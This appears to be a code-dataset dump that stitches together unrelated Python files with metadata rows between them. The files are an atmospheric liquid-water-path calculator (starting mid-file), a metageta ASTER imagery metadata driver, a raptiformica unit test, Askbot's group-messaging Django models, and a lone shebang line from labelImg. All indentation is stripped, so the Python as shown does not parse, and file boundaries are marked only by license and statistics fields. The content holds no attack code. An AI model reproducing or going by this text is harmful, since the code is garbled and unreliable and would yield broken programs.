# Calculate liquid water path (kg/m^2) when boundary layer liquid water potential temperature (theta [K]) and total
# water mixing ratio (rt [kg/kg]) are constants from surface (p_surf, Pa) up to boundary layer top (pblh, Pa or km).
# In addition to the liquid water path, function returns cloud base and top heights (m) and the maximum (or cloud top)
# liquid water mixing ratio (kg/kg).
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
g=9.8
p00=1.0e+05
alvl = 2.5e+06 # ! latent heat of vaporization
#
# It is assumed that a pblh value smaller than 10 is in kilometers and a value larger than that is Pa
if pblh<10.0:
z_top=pblh*1000. # from km to m (above surface)
p_top=0.
else:
z_top=10e3
p_top=p_surf-pblh # Pa (above surface)
#
# Outputs
lwp=0. # Liquid water path (g/m^2)
zb=-999. # Cloud base height (m)
zc=-999. # Cloud top height (m)
clw_max=0. # Maximum cloud liquid water
#
# a) Integrate to cloud base altitude
dz=1. # 1 m resolution
z=0. # The first altitude
press=p_surf # Start from surface
RH=0
while press>p_top and z<=z_top:
# Temperature (K)
tavg=theta*(press/p00)**rcp
#
# Current RH (%)
RH=calc_rh(rt,tavg,press)
if RH>100:
zb=z
break
#
# From z to z+dz
z+=dz
# Virtual temperature: T_virtual=T*(1+ep2*rl)
xsi=(1+ep2*rt)
# Pressure (Pa)
press-=g*dz*press/(R*tavg*xsi)
#
# No cloud or cloud water
if RH<=100: return lwp,zb,zc,clw_max
zb=z
#
# b) Integrate up to the given altitude
while press>p_top and z<=z_top:
# From z to z+dz
z+=dz
#
# Moist adiabatic lapse rate
#q_sat=calc_sat_mixr(press,tavg)
q_sat=calc_sat_mixr(press,tavg)
tavg-=g*(1+alvl*q_sat/(R*tavg))/(cp+alvl**2*q_sat/(Rm*tavg**2))*dz
#
# New pressure
xsi=(1+ep2*q_sat)
press-=g*dz*press/(R*tavg*xsi)
#
# Cloud water mixing ratio = totol - vapor
rc=max(0.,rt-q_sat)
# LWP integral
lwp+=rc*dz*press/(R*tavg*xsi)
#
# Cloud top height
zc=z
clw_max=rc
#
# Return LWP (kg/m^2) and boundary layer height (m)
return lwp,zb,zc,clw_max
def solve_rw_lwp(p_surf,theta,lwp,pblh,debug=False):
# Solve boundary layer total water mixing ratio (kg/kg) from liquid water potential temperature (theta [K]),
# liquid water path (lwp, kg/m^2) and boundary layer height (pblh, Pa or km) for an adiabatic cloud.
# For example, solve_rw_lwp(101780.,293.,100e-3,20000.) would return 0.00723684088331 [kg/kg].
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
p00=1.0e+05
#
# LWP tolerance: 0.1 % but not more than 0.1e-3 kg/m^2 and not less than 1e-3 kg/kg
tol=min(max(0.001*lwp,0.1e-3),1e-3)
#
# Surface temperature (dry, i.e. no fog)
t_surf=theta*(p_surf/p00)**rcp
#
# The highest LWP when RH=100% at the surface (no fog)
rw_max= calc_sat_mixr(p_surf,t_surf)
lwp_max,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_max)
# No fog cases
if lwp_max<lwp:
if debug: print ('Too high LWP (%5.1f g/m2), the maximum is %5.1f g/m2 (theta=%6.2f K, pblh=%3.0f hPa)')%(lwp*1e3, lwp_max*1e3,theta,pblh/100.)
return -999.
#
# The lowest LWP when RH=0% at the surface
rw_min=0.
lwp_min,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_min)
if lwp_min>lwp:
if debug: print ('Too low LWP (%5.1f g/m2), the minimum is %5.1f g/m2 (theta=%6.2f K, pblh=%3.0f hPa)')%(lwp*1e3, lwp_max*1e3,theta,pblh/100.)
return -999.
#
k=0
while k<100:
rw_new=(rw_min+rw_max)*0.5
lwp_new,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_new)
#
if abs(lwp-lwp_new)<tol or abs(rw_max-rw_min)<0.001e-3:
return rw_new
elif lwp<lwp_new:
rw_max=rw_new
else:
rw_min=rw_new
k+=1
#
# Failed
if debug: print ('Iteration failed: current LWP=%5.1f, target LWP=%5.1f')%(lwp_new*1e3,lwp*1e3)
return -999.
def solve_q_inv_RH(press,tpot,q,max_RH):
# Function for adjusting total water mixing ratio so that the calculated RH will be no more
# than the given RH limit. This function can be used to increase humidity inversion so that RH
# above cloud is less than 100%. For this purpose the typical inputs are:
# press [Pa] = p_surf - pblh
# tpot [K] = tpot_pbl + tpot_inv
# q [kg/kg] = q_pbl - q_inv
# RH [%] = 98.
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
p00=1.0e+05
#
# Temperature (K)
temp=tpot*(press/p00)**rcp
#
# RH (%)
rh=calc_rh(q,temp,press)
#
# All done if RH is not exceeding the RH limit
if rh<=max_RH: return q, rh, rh
#
# Solve q so that RH=max_RH
q_min=0.
q_max=q
k=0
while k<200:
q_new=0.5*(q_min+q_max)
rh_new=calc_rh(q_new,temp,press)
#
if abs(rh_new-max_RH)<0.001:
return q_new, rh_new, rh
elif rh_new>max_RH:
q_max=q_new
else:
q_min=q_new
k+=1
#
# Failed
print 'Failed to solve water vapor mixing ratio from given RH!'
return -999.,-999., rh
#
#
#
# ================ Helper functions ================
#
def ls_fit(xx,yy):
# Simple linear least squares fit: y=a+b*x
import numpy
#
# Ignore NaN's
x=[]; y=[]
i=0
for val in xx:
if not (numpy.isnan(xx[i]) or numpy.isnan(yy[i])):
x.append(xx[i])
y.append(yy[i])
i+=1
#
if len(x)<=1:
# Scalar
a=0.0; a_std=0.0
b=1.0; b_std=0.0
else:
# Matrix H
H = numpy.matrix( numpy.vstack([numpy.ones(len(x)),x]).T )
# LS solution
th=numpy.linalg.inv( H.T*H ) * H.T *numpy.matrix(y).T
# Outputs
a=numpy.asscalar(th[0])
b=numpy.asscalar(th[1])
# Parameter uncertainty
if len(x)>2:
# Variance
sv2=((numpy.matrix(y).T-H*th).T * (numpy.matrix(y).T-H*th) )/(len(x)-2)
std=numpy.sqrt( numpy.asscalar(sv2) * numpy.diagonal( numpy.linalg.inv( H.T*H ) ) )
# Outputs
a_std=numpy.asscalar(std[0])
b_std=numpy.asscalar(std[1])
else:
a_std=0.0
b_std=0.0
#
return a,b,a_std,b_std,
def average_scaled(x,y):
# Calculate average of x/y so that points where y=0 are ignored
import numpy
sx=0.
sx2=0.
n=0
i=0
for yy in y:
if yy>0.:
sx+=x[i]/yy
sx2+=(x[i]/yy)**2
n+=1
i+=1
#
if n==0:
return -999., -999.
elif n==1:
return sx, -999.
else:
return sx/n, numpy.sqrt( sx2/n - (sx/n)**2 )
#
# Functions from the LES model
#
def calc_psat_w(T):
# Function calculates the saturation vapor pressure (Pa) of liquid water as a function of temperature (K)
#
# thrm.f90: real function rslf(p,t)
c0=0.6105851e+03
c1=0.4440316e+02
c2=0.1430341e+01
c3=0.2641412e-01
c4=0.2995057e-03
c5=0.2031998e-05
c6=0.6936113e-08
c7=0.2564861e-11
c8=-.3704404e-13
#
x=max(-80.,T-273.16)
return c0+x*(c1+x*(c2+x*(c3+x*(c4+x*(c5+x*(c6+x*(c7+x*c8)))))))
def calc_sat_mixr(p,T):
# Function calculates saturation mixing ratio for water (kg/kg)
#
# thrm.f90: real function rslf(p,t)
#
# r=m_w//m_air
# R/Rm=287.04/461.5=.622
#
esl=calc_psat_w(T)
return .622*esl/(p-esl)
def calc_rh(rw,T,press):
# Calculate RH (%) from water vapor mixing ratio rw (r=m_w/m_air [kg/kg]), temperature (K) and pressure (Pa)
#
# r=m_w//m_air=pw/Rm/(pair/R)=pw/(p-pw)*R/Rm => pw=p*r/(R/Rm+r)
#
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # Specific gas constant for water
ep=R/Rm
#
psat=calc_psat_w(T)
return press*rw/(ep+rw)/psat*100
# When ep>>rw => RH=press*rw/(ep*psat)*100
# ================================ | gpl-3.0 | -796,236,915,224,271,000 | 29.041192 | 152 | 0.632624 | false | 2.454842 | false | false | false |
ssutee/metageta | metageta/formats/aster.py | 2 | 11439 | # -*- coding: utf-8 -*-
# Copyright (c) 2013 Australian Government, Department of the Environment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
Metadata driver for ASTER imagery
B{Format specifications}:
- U{http:#www.gdal.org/frmt_hdf4.html}
- U{http://asterweb.jpl.nasa.gov/documents/ASTER_L1_Product_Spec_Ver_1.3_July01.pdf}
- U{http://asterweb.jpl.nasa.gov/content/03_data/04_Documents/ASTER_L1_Product_Spec_Ver_1.3_July01.pdf} (inc description of GCTP projection parameters)
- U{http://lpdaac.usgs.gov/aster/ASTER_GeoRef_FINAL.pdf}
- U{http://www.science.aster.ersdac.or.jp/en/documnts/users_guide/index.html}
- U{http://www.science.aster.ersdac.or.jp/en/documnts/pdf/ASTER_Ref_V1.pdf}
'''
format_regex=[r'ast_l1[ab].*\.hdf$',r'pg-PR1[AB]0000-\d{10}_\d{3}_\d{3}$'] #HDF inc. ASTER
'''Regular expression list of file formats'''
#import base dataset module
import __dataset__
# import other modules (use "_" prefix to import privately)
import sys, os, re, glob, time, math, string
from metageta import utilities, geometry, spatialreferences
try:
from osgeo import gdal
from osgeo import gdalconst
from osgeo import osr
from osgeo import ogr
except ImportError:
import gdal
import gdalconst
import osr
import ogr
gdal.AllRegister()
class Dataset(__dataset__.Dataset): #Subclass of base Dataset class
def __init__(self,f=None):
if not f:f=self.fileinfo['filepath']
if f[:4]=='/vsi':raise NotImplementedError
self.filelist=glob.glob(os.path.splitext(f)[0]+'.*')
self._gdaldataset = geometry.OpenDataset(f)
self._hdf_md=self._gdaldataset.GetMetadata()
if not self._hdf_md.get('INSTRUMENTSHORTNAME')=='ASTER':
raise NotImplementedError #This error gets ignored in __init__.Open()
def __getmetadata__(self,f=None):
'''Read Metadata for ASTER HDF images as GDAL doesn't.'''
if not f:f=self.fileinfo['filepath']
hdf_sd=self._gdaldataset.GetSubDatasets()
hdf_sd= [sd for sd,sz in hdf_sd if 'ImageData' in sd]
hdf_md=self._hdf_md
#sd,sz = hdf_sd[0]
sd = hdf_sd[0]
sd=geometry.OpenDataset(sd)
nbands=len(hdf_sd)
ncols=[]
nrows=[]
nbits=[]
bands=[]
datatypes=[]
cellxy=[]
for i in range(0,len(hdf_md['PROCESSEDBANDS']), 2):
band=hdf_md['PROCESSEDBANDS'][i:i+2]
if i/2+1 <= 4:
bands.append('VNIR'+band)
cellxy.append('15')
elif i/2+1 <= 10:
bands.append('SWIR'+band)
cellxy.append('30')
else:
bands.append('TIR'+band)
cellxy.append('90')
if band.isdigit():band=str(int(band)) #Get rid of leading zero
cols,rows,bytes=map(int,hdf_md['IMAGEDATAINFORMATION%s' % band].split(','))
if bytes==1:datatypes.append('Byte')
elif bytes==2:datatypes.append('UInt16')
ncols.append(str(cols))
nrows.append(str(rows))
nbits.append(str(bytes*8))
ncols=','.join(ncols)
nrows=','.join(nrows)
nbits=','.join(nbits)
bands=','.join(bands)
datatypes=','.join(datatypes)
cellxy=','.join(cellxy)
uly,ulx=[float(xy) for xy in hdf_md['UPPERLEFT'].split(',')]
ury,urx=[float(xy) for xy in hdf_md['UPPERRIGHT'].split(',')]
lry,lrx=[float(xy) for xy in hdf_md['LOWERRIGHT'].split(',')]
lly,llx=[float(xy) for xy in hdf_md['LOWERLEFT'].split(',')]
ext=[[ulx,uly],[urx,ury],[lrx,lry],[llx,lly],[ulx,uly]]
#SRS reported by GDAL is slightly dodgy, GDA94 is not recognised and doesn't set the North/South properly
#Get it anyway so we can work out if it's GDA94 based on the spheroid
srs=sd.GetGCPProjection()
src_srs=osr.SpatialReference(srs)
tgt_srs=osr.SpatialReference()
geogcs=osr.SpatialReference()
if src_srs.GetAttrValue('SPHEROID') == 'GRS 1980':geogcs.ImportFromEPSG(4283) #Assume 'GDA94'
else:geogcs.ImportFromEPSG(4326) #Assume 'WGS84'
tgt_srs.CopyGeogCSFrom(geogcs)
if hdf_md['PROCESSINGLEVELID'].upper()=='1A':
units='deg'
else:
#projparams=map(float, hdf_md['PROJECTIONPARAMETERS1'].split(','))
if hdf_md['MPMETHOD1'] == 'UTM':#Universal Transverse Mercator
if uly < 0:bNorth=False #GDAL doesn't set the North/South properly
else:bNorth=True
nZone = int(hdf_md['UTMZONECODE1'])
tgt_srs.SetUTM(nZone,bNorth)
units='m'
#Other projections not (yet?) implemented...
#elif hdf_md['MPMETHOD1'] == 'PS':#Polar Stereographic
# #dfCenterLon = ? GTCP projection params don't list cenlon/lat for PS
# dfCenterLat = ?
# dfScale = ?
# tgt_srs.SetPS(dfCenterLat,dfCenterLon,dfScale,0.0,0.0)
#elif hdf_md['MPMETHOD1'] == 'LAMCC':#Lambert Conformal Conic
# dfCenterLon = ?
# dfCenterLat = ?
# dfStdP1 = ?
# dfStdP2 = ?
# tgt_srs.SetLCC(dfStdP1,dfStdP2,dfCenterLat,dfCenterLon,0,0)
#elif hdf_md['MPMETHOD1'] == 'SOM':#Space Oblique Mercator
# dfCenterLon = ?
# dfCenterLat = ?
# srs.SetMercator(dfCenterLat,dfCenterLon,0,0,0)
#elif hdf_md['MPMETHOD1'] == 'EQRECT':#Equi-Rectangular
# dfCenterLon = ?
# dfCenterLat = ?
# tgt_srs.SetMercator(dfCenterLat,dfCenterLon,0,0,0)
else: #Assume Geog
units='deg'
srs=tgt_srs.ExportToWkt()
self.metadata['UL']='%s,%s' % tuple(ext[0])
self.metadata['UR']='%s,%s' % tuple(ext[1])
self.metadata['LR']='%s,%s' % tuple(ext[2])
self.metadata['LL']='%s,%s' % tuple(ext[3])
self.metadata['metadata']='\n'.join(['%s: %s' %(m,hdf_md[m]) for m in hdf_md])
self.metadata['satellite']='Terra'
self.metadata['sensor']='ASTER'
self.metadata['filetype'] = self._gdaldataset.GetDriver().ShortName+'/'+self._gdaldataset.GetDriver().LongName + ' (ASTER)'
self.metadata['sceneid'] = hdf_md['ASTERSCENEID']
self.metadata['level'] = hdf_md['PROCESSINGLEVELID']
if '-' in hdf_md['CALENDARDATE']:imgdate = hdf_md['CALENDARDATE']
else:imgdate = time.strftime(utilities.dateformat,time.strptime(hdf_md['CALENDARDATE'],'%Y%m%d')) #ISO 8601
imgtime = hdf_md.get('TIMEOFDAY')
if imgtime:self.metadata['imgdate'] = time.strftime(utilities.datetimeformat,time.strptime(imgdate+imgtime[0:6],'%Y-%m-%d%H%M%S')) #ISO 8601
else:self.metadata['imgdate'] = imgdate
#self.metadata['imgdate'] = hdf_md['CALENDARDATE']
self.metadata['cloudcover'] = float(hdf_md['SCENECLOUDCOVERAGE'])
if hdf_md['FLYINGDIRECTION']=='DE':self.metadata['orbit'] = 'Descending'
else:self.metadata['orbit'] = 'Ascending'
self.metadata['rotation']=float(hdf_md.get('MAPORIENTATIONANGLE',hdf_md.get('SCENEORIENTATIONANGLE')))
if abs(self.metadata['rotation']) < 1.0: self.metadata['orientation']='Map oriented'
else: self.metadata['orientation']='Path oriented'
self.metadata['sunazimuth'],self.metadata['sunelevation']=map(float,hdf_md['SOLARDIRECTION'].split(','))
self.metadata['viewangle'] = float(hdf_md['POINTINGANGLE'])
self.metadata['cols'] = ncols
self.metadata['rows'] = nrows
self.metadata['nbands'] = nbands
self.metadata['datatype'] = datatypes
self.metadata['nbits'] = nbits
self.metadata['nodata']=','.join(['0' for i in range(0,nbands)])
self.metadata['bands'] = bands
self.metadata['resampling'] = hdf_md.get('RESMETHOD1') #Assume same for all...
self.metadata['srs']= srs
self.metadata['epsg']= spatialreferences.IdentifyAusEPSG(srs)
self.metadata['units']= units
self.metadata['cellx'],self.metadata['celly']=cellxy,cellxy
#Geotransform
ext=[[ulx,uly],[urx,ury],[lrx,lry],[llx,lly],[ulx,uly]]
ncols=map(int, str(ncols).split(','))
nrows=map(int, str(nrows).split(','))
cellx,celly=[],[]
j=0
while j < len(ncols):
gcps=[];i=0
lr=[[0,0],[ncols[j],0],[ncols[j],nrows[j]],[0,nrows[j]]]
while i < len(ext)-1: #don't need the last xy pair
gcp=gdal.GCP()
gcp.GCPPixel,gcp.GCPLine=lr[i]
gcp.GCPX,gcp.GCPY=ext[i]
gcp.Id=str(i)
gcps.append(gcp)
i+=1
j+=1
geotransform = gdal.GCPsToGeoTransform(gcps)
x,y=geometry.CellSize(geotransform)
cellx.append(str(x))
celly.append(str(abs(y)))
self.metadata['cellx']=','.join(cellx)
self.metadata['celly']=','.join(celly)
srs=osr.SpatialReference()
srs.ImportFromEPSG(4326)
self.metadata['srs']= srs.ExportToWkt()
self.metadata['UL']='%s,%s' % tuple(ext[0])
self.metadata['UR']='%s,%s' % tuple(ext[1])
self.metadata['LR']='%s,%s' % tuple(ext[2])
self.metadata['LL']='%s,%s' % tuple(ext[3])
self.metadata['metadata']='\n'.join(['%s: %s' %(m,hdf_md[m]) for m in hdf_md])
self.metadata['filesize']=sum([os.path.getsize(file) for file in self.filelist])
self.metadata['compressionratio']=0
self.metadata['compressiontype']='None'
self.extent=ext
#Build gdaldataset object for overviews
vrtcols=ncols[0]
vrtrows=nrows[0]
#vrtbands=[sd for sd,sn in hdf_sd[0:4]]#The 4 VNIR bands
vrtbands=hdf_sd[0:4]#The 4 VNIR bands
vrt=geometry.CreateSimpleVRT(vrtbands,vrtcols,vrtrows,datatypes.split(',')[0])
self._gdaldataset=geometry.OpenDataset(vrt)
for i in range(1,5):
self._gdaldataset.GetRasterBand(i).SetNoDataValue(0)
| mit | -5,271,356,719,638,829,000 | 43.756 | 155 | 0.587551 | false | 3.344737 | false | false | false |
vdloo/raptiformica | tests/unit/raptiformica/distributed/members/test_try_get_members_list.py | 1 | 1267 | from raptiformica.distributed.members import try_get_members_list
from tests.testcase import TestCase
class TestTryGetMembersList(TestCase):
def setUp(self):
self.try_machine_command = self.set_up_patch('raptiformica.distributed.members.try_machine_command')
self.try_machine_command.return_value = ('output', '5.6.7.8', '22')
self.host_and_port_pairs = [
('1.2.3.4', '2222'),
('5.6.7.8', '22')
]
def test_try_get_members_list_tries_machine_command(self):
try_get_members_list(self.host_and_port_pairs)
expected_command = ['consul', 'members']
self.try_machine_command.assert_called_once_with(
self.host_and_port_pairs,
expected_command,
attempt_message="Trying to get members list from {}:{}",
all_failed_message="Could not list members in the distributed network. "
"Maybe no meshnet has been established yet. "
"Do you have at least three machines running?"
)
def test_try_get_members_list_returns_output_from_first_successful_members_list(self):
ret = try_get_members_list(self.host_and_port_pairs)
self.assertEqual(ret, 'output')
| mit | 7,409,344,987,150,709,000 | 41.233333 | 108 | 0.620363 | false | 3.693878 | true | false | false |
PearsonIOKI/compose-forum | askbot/deps/group_messaging/models.py | 8 | 15440 | """models for the ``group_messaging`` app
"""
import copy
import datetime
import urllib
from askbot.mail import send_mail #todo: remove dependency?
from django.template.loader import get_template
from django.db import models
from django.db.models import signals
from django.conf import settings as django_settings
from django.contrib.auth.models import Group
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.utils.importlib import import_module
from django.utils.translation import ugettext as _
MAX_HEADLINE_LENGTH = 80
MAX_SENDERS_INFO_LENGTH = 64
MAX_SUBJECT_LINE_LENGTH = 30
#dummy parse message function
parse_message = lambda v: v
GROUP_NAME_TPL = '_personal_%s'
def get_recipient_names(recipient_groups):
"""returns list of user names if groups are private,
or group names, otherwise"""
names = set()
for group in recipient_groups:
if group.name.startswith('_personal_'):
names.add(group.user_set.all()[0].username)
else:
names.add(group.name)
return names
def get_personal_group_by_user_id(user_id):
return Group.objects.get(name=GROUP_NAME_TPL % user_id)
def get_personal_groups_for_users(users):
"""for a given list of users return their personal groups"""
group_names = [(GROUP_NAME_TPL % user.id) for user in users]
return Group.objects.filter(name__in=group_names)
def get_personal_group(user):
"""returns personal group for the user"""
return get_personal_group_by_user_id(user.id)
def create_personal_group(user):
"""creates a personal group for the user"""
group = Group(name=GROUP_NAME_TPL % user.id)
group.save()
return group
class LastVisitTime(models.Model):
"""just remembers when a user has
last visited a given thread
"""
user = models.ForeignKey(User)
message = models.ForeignKey('Message')
at = models.DateTimeField(auto_now_add=True)
class Meta:
unique_together = ('user', 'message')
class SenderListManager(models.Manager):
"""model manager for the :class:`SenderList`"""
def get_senders_for_user(self, user=None):
"""returns query set of :class:`User`"""
user_groups = user.groups.all()
lists = self.filter(recipient__in=user_groups)
user_ids = lists.values_list(
'senders__id', flat=True
).distinct()
return User.objects.filter(id__in=user_ids)
class SenderList(models.Model):
"""a model to store denormalized data
about who sends messages to any given person
sender list is populated automatically
as new messages are created
"""
recipient = models.ForeignKey(Group, unique=True)
senders = models.ManyToManyField(User)
objects = SenderListManager()
class MessageMemo(models.Model):
"""A bridge between message recipients and messages
these records are only created when user sees a message.
The idea is that using groups as recipients, we can send
messages to massive numbers of users, without cluttering
the database.
Instead we'll be creating a "seen" message after user
reads the message.
"""
SEEN = 0
ARCHIVED = 1
STATUS_CHOICES = (
(SEEN, 'seen'),
(ARCHIVED, 'archived')
)
user = models.ForeignKey(User)
message = models.ForeignKey('Message', related_name='memos')
status = models.SmallIntegerField(
choices=STATUS_CHOICES, default=SEEN
)
class Meta:
unique_together = ('user', 'message')
class MessageManager(models.Manager):
"""model manager for the :class:`Message`"""
def get_sent_threads(self, sender=None):
"""returns list of threads for the "sent" mailbox
this function does not deal with deleted=True
"""
responses = self.filter(sender=sender)
responded_to = models.Q(descendants__in=responses, root=None)
seen_filter = models.Q(
memos__status=MessageMemo.SEEN,
memos__user=sender
)
seen_responses = self.filter(responded_to & seen_filter)
unseen_responses = self.filter(responded_to & ~models.Q(memos__user=sender))
return (
self.get_threads(sender=sender) \
| seen_responses.distinct() \
| unseen_responses.distinct()
).distinct()
def get_threads(self, recipient=None, sender=None, deleted=False):
"""returns query set of first messages in conversations,
based on recipient, sender and whether to
load deleted messages or not"""
if sender and sender == recipient:
raise ValueError('sender cannot be the same as recipient')
filter_kwargs = {
'root': None,
'message_type': Message.STORED
}
if recipient:
filter_kwargs['recipients__in'] = recipient.groups.all()
else:
#todo: possibly a confusing hack - for this branch -
#sender but no recipient in the args - we need "sent" origin threads
recipient = sender
user_thread_filter = models.Q(**filter_kwargs)
filter = user_thread_filter
if sender:
filter = filter & models.Q(sender=sender)
if deleted:
deleted_filter = models.Q(
memos__status=MessageMemo.ARCHIVED,
memos__user=recipient
)
return self.filter(filter & deleted_filter)
else:
#rather a tricky query (may need to change the idea to get rid of this)
#select threads that have a memo for the user, but the memo is not ARCHIVED
#in addition, select threads that have zero memos for the user
marked_as_non_deleted_filter = models.Q(
memos__status=MessageMemo.SEEN,
memos__user=recipient
)
#part1 - marked as non-archived
part1 = self.filter(filter & marked_as_non_deleted_filter)
#part2 - messages for the user without an attached memo
part2 = self.filter(filter & ~models.Q(memos__user=recipient))
return (part1 | part2).distinct()
def create(self, **kwargs):
"""creates a message"""
root = kwargs.get('root', None)
if root is None:
parent = kwargs.get('parent', None)
if parent:
if parent.root:
root = parent.root
else:
root = parent
kwargs['root'] = root
headline = kwargs.get('headline', kwargs['text'])
kwargs['headline'] = headline[:MAX_HEADLINE_LENGTH]
kwargs['html'] = parse_message(kwargs['text'])
message = super(MessageManager, self).create(**kwargs)
#creator of message saw it by definition
#crate a "seen" memo for the sender, because we
#don't want to inform the user about his/her own post
sender = kwargs['sender']
MessageMemo.objects.create(
message=message, user=sender, status=MessageMemo.SEEN
)
return message
def create_thread(self, sender=None, recipients=None, text=None):
"""creates a stored message and adds recipients"""
message = self.create(
message_type=Message.STORED,
sender=sender,
senders_info=sender.username,
text=text,
)
now = datetime.datetime.now()
LastVisitTime.objects.create(message=message, user=sender, at=now)
names = get_recipient_names(recipients)
message.add_recipient_names_to_senders_info(recipients)
message.save()
message.add_recipients(recipients)
message.send_email_alert()
return message
def create_response(self, sender=None, text=None, parent=None):
message = self.create(
parent=parent,
message_type=Message.STORED,
sender=sender,
text=text,
)
#recipients are parent's recipients + sender
#creator of response gets memo in the "read" status
recipients = set(parent.recipients.all())
if sender != parent.sender:
senders_group = get_personal_group(parent.sender)
parent.add_recipients([senders_group])
recipients.add(senders_group)
message.add_recipients(recipients)
#add author of the parent as a recipient to parent
#update headline
message.root.headline = text[:MAX_HEADLINE_LENGTH]
#mark last active timestamp for the root message
message.root.last_active_at = datetime.datetime.now()
#update senders info - stuff that is shown in the thread heading
message.root.update_senders_info()
#unarchive the thread for all recipients
message.root.unarchive()
message.send_email_alert()
return message
class Message(models.Model):
"""the message model allowing users to send
messages to other users and groups, via
personal groups.
"""
STORED = 0
TEMPORARY = 1
ONE_TIME = 2
MESSAGE_TYPE_CHOICES = (
(STORED, 'email-like message, stored in the inbox'),
(ONE_TIME, 'will be shown just once'),
(TEMPORARY, 'will be shown until certain time')
)
message_type = models.SmallIntegerField(
choices=MESSAGE_TYPE_CHOICES,
default=STORED,
)
sender = models.ForeignKey(User, related_name='group_messaging_sent_messages')
senders_info = models.CharField(
max_length=MAX_SENDERS_INFO_LENGTH,
default=''
)#comma-separated list of a few names
recipients = models.ManyToManyField(Group)
root = models.ForeignKey(
'self', null=True,
blank=True, related_name='descendants'
)
parent = models.ForeignKey(
'self', null=True,
blank=True, related_name='children'
)
headline = models.CharField(max_length=MAX_HEADLINE_LENGTH)
text = models.TextField(
null=True, blank=True,
help_text='source text for the message, e.g. in markdown format'
)
html = models.TextField(
null=True, blank=True,
help_text='rendered html of the message'
)
sent_at = models.DateTimeField(auto_now_add=True)
last_active_at = models.DateTimeField(auto_now_add=True)
active_until = models.DateTimeField(blank=True, null=True)
objects = MessageManager()
def add_recipient_names_to_senders_info(self, recipient_groups):
names = get_recipient_names(recipient_groups)
old_names = set(self.senders_info.split(','))
names |= old_names
self.senders_info = ','.join(names)
def add_recipients(self, recipients):
"""adds recipients to the message
and updates the sender lists for all recipients
todo: sender lists may be updated in a lazy way - per user
"""
self.recipients.add(*recipients)
for recipient in recipients:
sender_list, created = SenderList.objects.get_or_create(recipient=recipient)
sender_list.senders.add(self.sender)
def get_absolute_url(self, user=None):
"""returns absolute url to the thread"""
assert(user != None)
settings = django_settings.GROUP_MESSAGING
func_path = settings['BASE_URL_GETTER_FUNCTION']
path_bits = func_path.split('.')
url_getter = getattr(
import_module('.'.join(path_bits[:-1])),
path_bits[-1]
)
params = copy.copy(settings['BASE_URL_PARAMS'])
params['thread_id'] = self.id
url = url_getter(user) + '?' + urllib.urlencode(params)
#if include_domain_name: #don't need this b/c
# site = Site.objects.get_current()
# url = 'http://' + site.domain + url
return url
def get_email_subject_line(self):
"""forms subject line based on the root message
and prepends 'Re': if message is non-root
"""
subject = self.get_root_message().text[:MAX_SUBJECT_LINE_LENGTH]
if self.root:
subject = _('Re: ') + subject
return subject
def get_root_message(self):
"""returns root message or self
if current message is root
"""
return self.root or self
def get_recipients_users(self):
"""returns query set of users"""
groups = self.recipients.all()
return User.objects.filter(
groups__in=groups
).exclude(
id=self.sender.id
).distinct()
def get_timeline(self):
"""returns ordered query set of messages in the thread
with the newest first"""
root = self.get_root_message()
root_qs = Message.objects.filter(id=root.id)
return (root.descendants.all() | root_qs).order_by('-sent_at')
def send_email_alert(self):
"""signal handler for the message post-save"""
root_message = self.get_root_message()
data = {'messages': self.get_timeline()}
template = get_template('group_messaging/email_alert.html')
body_text = template.render(data)
subject = self.get_email_subject_line()
for user in self.get_recipients_users():
#todo change url scheme so that all users have the same
#urls within their personal areas of the user profile
#so that we don't need to have loops like this one
thread_url = root_message.get_absolute_url(user)
thread_url = thread_url.replace('&', '&')
#in the template we have a placeholder to be replaced like this:
body_text = body_text.replace('THREAD_URL_HOLE', thread_url)
send_mail(
subject,
body_text,
django_settings.DEFAULT_FROM_EMAIL,
[user.email,],
)
def update_senders_info(self):
"""update the contributors info,
meant to be used on a root message only
"""
senders_names = self.senders_info.split(',')
if self.sender.username in senders_names:
senders_names.remove(self.sender.username)
senders_names.insert(0, self.sender.username)
self.senders_info = (','.join(senders_names))[:64]
self.save()
def unarchive(self, user=None):
"""unarchive message for all recipients"""
archived_filter = {'status': MessageMemo.ARCHIVED}
if user:
archived_filter['user'] = user
memos = self.memos.filter(**archived_filter)
memos.update(status=MessageMemo.SEEN)
def set_status_for_user(self, status, user):
"""set specific status to the message for the user"""
memo, created = MessageMemo.objects.get_or_create(user=user, message=self)
memo.status = status
memo.save()
def archive(self, user):
"""mark message as archived"""
self.set_status_for_user(MessageMemo.ARCHIVED, user)
def mark_as_seen(self, user):
"""mark message as seen"""
self.set_status_for_user(MessageMemo.SEEN, user)
| gpl-3.0 | -6,098,108,620,845,167,000 | 34.251142 | 88 | 0.608549 | false | 4.15277 | false | false | false |
tzutalin/labelImg | libs/yolo_io.py | 1 | 4998 | #!/usr/bin/env python
